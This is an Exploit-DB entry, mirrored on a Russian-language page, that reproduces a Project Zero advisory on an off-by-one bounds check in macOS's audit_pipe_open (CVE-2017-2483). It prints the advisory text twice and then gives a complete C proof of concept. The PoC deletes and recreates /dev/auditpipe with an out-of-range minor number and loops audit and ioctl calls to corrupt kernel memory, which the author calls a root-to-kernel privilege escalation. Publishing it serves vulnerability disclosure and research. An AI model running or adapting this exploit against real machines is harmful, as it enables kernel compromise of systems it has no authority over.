- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 41797
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- MACOS
- CVE
- cve-2017-2483
- Дата публикации
- 2017-04-04
Apple macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption
C:
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1126
MacOS kernel memory corruption due to off-by-one in audit_pipe_open
audit_pipe_open is the special file open handler for the auditpipe device (major number 10.)
Here's the code:
static int
audit_pipe_open(dev_t dev, __unused int flags, __unused int devtype,
__unused proc_t p)
{
struct audit_pipe *ap;
int u;
u = minor(dev);
if (u < 0 || u > MAX_AUDIT_PIPES)
return (ENXIO);
AUDIT_PIPE_LIST_WLOCK();
ap = audit_pipe_dtab[u];
if (ap == NULL) {
ap = audit_pipe_alloc();
if (ap == NULL) {
AUDIT_PIPE_LIST_WUNLOCK();
return (ENOMEM);
}
audit_pipe_dtab[u] = ap;
We can control the minor number via mknod. Here's the definition of audit_pipe_dtab:
static struct audit_pipe *audit_pipe_dtab[MAX_AUDIT_PIPES];
There's an off-by-one in the minor number bounds check
(u < 0 || u > MAX_AUDIT_PIPES)
should be
(u < 0 || u >= MAX_AUDIT_PIPES)
The other special file operation handlers assume that the minor number of an opened device
is correct therefore it isn't validated for example in the ioctl handler:
static int
audit_pipe_ioctl(dev_t dev, u_long cmd, caddr_t data,
__unused int flag, __unused proc_t p)
{
...
ap = audit_pipe_dtab[minor(dev)];
KASSERT(ap != NULL, ("audit_pipe_ioctl: ap == NULL"));
...
switch (cmd) {
case FIONBIO:
AUDIT_PIPE_LOCK(ap);
if (*(int *)data)
Directly after the audit_pipe_dtab array in the bss is this global variable:
static u_int64_t audit_pipe_drops;
audit_pipe_drops will be incremented each time an audit message enqueue fails:
if (ap->ap_qlen >= ap->ap_qlimit) {
ap->ap_drops++;
audit_pipe_drops++;
return;
}
So by setting a small ap_qlimit via the AUDITPIPE_SET_QLIMIT ioctl we can increment the
struct audit_pipe* which is read out-of-bounds.
For this PoC I mknod a /dev/auditpipe with the minor number 32, create a new log file
and enable auditing. I then set the QLIMIT to 1 and alternately enqueue a new audit record
and call and ioctl. Each time the enqueue fails it will increment the struct audit_pipe*
then the ioctl will try to use that pointer.
This is a root to kernel privesc.
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
*/
//ianbeer
#if 0
MacOS kernel memory corruption due to off-by-one in audit_pipe_open
audit_pipe_open is the special file open handler for the auditpipe device (major number 10.)
Here's the code:
static int
audit_pipe_open(dev_t dev, __unused int flags, __unused int devtype,
__unused proc_t p)
{
struct audit_pipe *ap;
int u;
u = minor(dev);
if (u < 0 || u > MAX_AUDIT_PIPES)
return (ENXIO);
AUDIT_PIPE_LIST_WLOCK();
ap = audit_pipe_dtab[u];
if (ap == NULL) {
ap = audit_pipe_alloc();
if (ap == NULL) {
AUDIT_PIPE_LIST_WUNLOCK();
return (ENOMEM);
}
audit_pipe_dtab[u] = ap;
We can control the minor number via mknod. Here's the definition of audit_pipe_dtab:
static struct audit_pipe *audit_pipe_dtab[MAX_AUDIT_PIPES];
There's an off-by-one in the minor number bounds check
(u < 0 || u > MAX_AUDIT_PIPES)
should be
(u < 0 || u >= MAX_AUDIT_PIPES)
The other special file operation handlers assume that the minor number of an opened device
is correct therefore it isn't validated for example in the ioctl handler:
static int
audit_pipe_ioctl(dev_t dev, u_long cmd, caddr_t data,
__unused int flag, __unused proc_t p)
{
...
ap = audit_pipe_dtab[minor(dev)];
KASSERT(ap != NULL, ("audit_pipe_ioctl: ap == NULL"));
...
switch (cmd) {
case FIONBIO:
AUDIT_PIPE_LOCK(ap);
if (*(int *)data)
Directly after the audit_pipe_dtab array in the bss is this global variable:
static u_int64_t audit_pipe_drops;
audit_pipe_drops will be incremented each time an audit message enqueue fails:
if (ap->ap_qlen >= ap->ap_qlimit) {
ap->ap_drops++;
audit_pipe_drops++;
return;
}
So by setting a small ap_qlimit via the AUDITPIPE_SET_QLIMIT ioctl we can increment the
struct audit_pipe* which is read out-of-bounds.
For this PoC I mknod a /dev/auditpipe with the minor number 32, create a new log file
and enable auditing. I then set the QLIMIT to 1 and alternately enqueue a new audit record
and call and ioctl. Each time the enqueue fails it will increment the struct audit_pipe*
then the ioctl will try to use that pointer.
This is a root to kernel privesc.
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <net/bpf.h>
#include <net/if.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <bsm/audit.h>
#include <security/audit/audit_ioctl.h>
int main(int argc, char** argv) {
system("rm -rf /dev/auditpipe");
system("mknod /dev/auditpipe c 10 32");
int fd = open("/dev/auditpipe", O_RDWR);
if (fd == -1) {
perror("failed to open auditpipe device\n");
exit(EXIT_FAILURE);
}
printf("opened device\n");
system("touch a_log_file");
int auditerr = auditctl("a_log_file");
if (auditerr == -1) {
perror("failed to set a new log file\n");
}
uint32_t qlim = 1;
int err = ioctl(fd, AUDITPIPE_SET_QLIMIT, &qlim);
if (err == -1) {
perror("AUDITPIPE_SET_QLIMIT");
exit(EXIT_FAILURE);
}
while(1) {
char* audit_data = "\x74hello";
int audit_len = strlen(audit_data)+1;
audit(audit_data, audit_len);
uint32_t nread = 0;
int err = ioctl(fd, FIONREAD, &qlim);
if (err == -1) {
perror("FIONREAD");
exit(EXIT_FAILURE);
}
}
return 0;
}
- Источник
- www.exploit-db.com